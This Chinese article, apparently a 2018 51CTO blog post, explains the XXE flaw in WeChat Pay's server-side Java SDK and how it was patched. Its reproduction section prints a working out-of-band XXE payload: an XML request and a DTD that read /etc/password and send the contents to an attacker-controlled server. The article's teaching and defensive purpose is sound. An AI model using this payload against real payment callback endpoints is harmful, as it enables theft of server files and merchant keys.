会员服务 ·

可怕！微信支付被曝漏洞，危害不只是“0元也能买买买”！

2018 年 7 月 5 日 51CTO博客

“

微信是最流行的 App 之一，特别是随着“二维码付款”成为潮流，越来越多的小伙伴早已习惯不带现金出门。

如果有人告诉你，现在不用你花一分钱，就能用[微信支付]买买买，这种天上掉馅饼的事，你会相信吗?

7 月 1 日，在老牌漏洞披露平台 Full Disclosure 出现了一封写给微信支付的公开信。

发件人是 Rose Jackcode，信的标题是《微信支付官方SDK的XXE安全漏洞(微信支付在商户页面遗留了一个后门)》。

▲发表在漏洞披露平台 Full Disclosure 上的公开信

发件人 Rose Jackcode 在信中称，他在微信支付官方 SDK(软件工具开发包)发现了一个安全漏洞，此漏洞可导致商家服务器被入侵，一旦攻击者获得商家的关键安全密钥，就可以通过发送伪造信息来欺骗商家而无需付费购买任何东西。

王牌对王牌

换句话说，黑客利用微信支付的这个漏洞，能实现 0 元无限买买买。

这并不是说说而已，这位网友还直接甩出了两张图，展示出漏洞利用的过程，中招者是 VIVO 和陌陌。

▲陌陌、VIVO 的微信支付漏洞利用过程

看不懂没关系，为了方便小伙伴理解，他们举了个小例子：

这个过程叫“商户回调接口”，而这个漏洞可以让微信支付产生“人家付款成功了”的错觉，从而让黑客实现 0 元购。

随后，微信支付技术安全团队已关注问题并及时排查，并进行更新，修复了已知的安全漏洞。

虽然微信支付安全漏洞已经被修复，但大家关注的热度依旧高涨。查看百度热搜指数发现，微信支付被爆漏洞这一话题依旧高居榜首。

一定不少小伙伴要吐槽了：“怎么又是修复好了才告诉我？有没有感觉错过了几百万哈....

大多数人可能并不关注怎么修复安全漏洞，而是较为关心对个体产生的影响。下面我们从技术人的角度谈谈这次微信支付曝出的漏洞。

技术角度解读微信支付曝出的漏洞

对于昨天（2018-07-04）微信支付的 SDK 曝出重大漏洞（XXE 漏洞），通过该漏洞，攻击者可以获取服务器中目录结构、文件内容，如代码、各种私钥等。

获取这些信息以后，攻击者便可以为所欲为，其中就包括众多媒体所宣传的“0 元也能买买买”。

漏洞报告地址：http://seclists.org/fulldisclosure/2018/Jul/3

漏洞原理

XXE 漏洞

此次曝出的漏洞属于 XXE 漏洞，即 XML 外部实体注入（XML External Entity Injection）。

XML 文档除了可以包含声明和元素以外，还可以包含文档类型定义（即 DTD）；如下图所示：

在 DTD 中，可以引进实体，在解析 XML 时，实体将会被替换成相应的引用内容。

该实体可以由外部引入(支持 http、ftp 等协议，后文以 http 为例说明)，如果通过该外部实体进行攻击，就是 XXE 攻击。

可以说，XXE 漏洞之所以能够存在，本质上在于在解析 XML 的时候，可以与外部进行通信；当 XML 文档可以由攻击者任意构造时，攻击便成为可能。

在利用 XXE 漏洞可以做的事情当中，最常见最容易实现的，便是读取服务器的信息，包括目录结构、文件内容等；本次微信支付爆出的漏洞便属于这一种。

微信支付漏洞

本次漏洞影响的范围是：在微信支付异步回调接口中，使用微信支付 SDK 进行 XML 解析的应用。

注意这里的 SDK 是服务器端的 SDK，App 端使用 SDK 并不受影响。

SDK 下载地址如下（目前微信官方宣传漏洞已修复）：https://pay.weixin.qq.com/wiki/doc/api/download/WxPayAPI_JAVA_v3.zip

SDK 中导致漏洞的代码是 WXPayUtil 工具类中的 xmlToMap() 方法：

如上图所示，由于在解析 XML 时没有对外部实体的访问做任何限制，如果攻击者恶意构造 XML 请求，便可以对服务器进行攻击。下面通过实例介绍攻击的方法。

攻击复现

下面在本机环境下进行复现。

假设本地的 Web 服务器 127.0.0.1:8080 中存在 POST 接口：/wxpay/callback，该接口中接收 XML 字符串做参数，并调用前述的 WXPayUtil.xmlToMap(strXml) 对 XML 参数进行解析。

此外，/etc/password 中存储了重要的密码数据（如 password1234）。

攻击时构造的请求如下：

其中 XML 内容如下：

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
    <!ENTITY % file SYSTEM "file:///etc/password">
    <!ENTITY % xxe SYSTEM "http://127.0.0.1:9000/xxe.dtd">
    %xxe;
]>

其中 /etc/password 为要窃取的对象，http://127.0.0.1:9000/xxe.dtd 为攻击者服务器中的 dtd 文件，内容如下：

<!ENTITY % shell "<!ENTITY % upload SYSTEM 'http://127.0.0.1:9000/evil/%file;'>">
%shell;
%upload;

通过 xml+dtd 文件，攻击者便可以在服务器 http://127.0.0.1:9000 中会收到如下请求：http://127.0.0.1:9000/evil/password1234。

这样，攻击者便得到了 /etc/password 文件的内容。

在本例中，攻击者窃取了 /etc/password 文件中的内容，实际上攻击者还可以获取服务器中的目录结构以及其他文件，只要启动 Web 应用的用户具有相应的读权限。

如果获取的信息比较复杂，如包含特殊符号，无法直接通过 http 的 URL 发送，则可以采用对文件内容进行 Base64 编码等方法解决。

漏洞的解决

解决该漏洞的原理非常简单，只要禁止解析 XML 时访问外部实体即可。

漏洞曝出以后，微信进行了紧急修复，一方面是更新了 SDK，并提醒开发者使用最新的 SDK。

SDK 中修复代码如下：

加入了如下两行代码：

documentBuilderFactory.setExpandEntityReferences(false);
documentBuilderFactory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);

此外，微信官方也给出了关于 XXE 漏洞的最佳安全实践，可以参考：

https://pay.weixin.qq.com/wiki/doc/api/jsapi.php?chapter=23_5

笔者本人使用上述方案中建议的如下代码修复了该漏洞：

DocumentBuilderFactory documentBuilderFactory = DocumentBuilderFactory.newInstance();
documentBuilderFactory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
DocumentBuilder documentBuilder = documentBuilderFactory.newDocumentBuilder();
……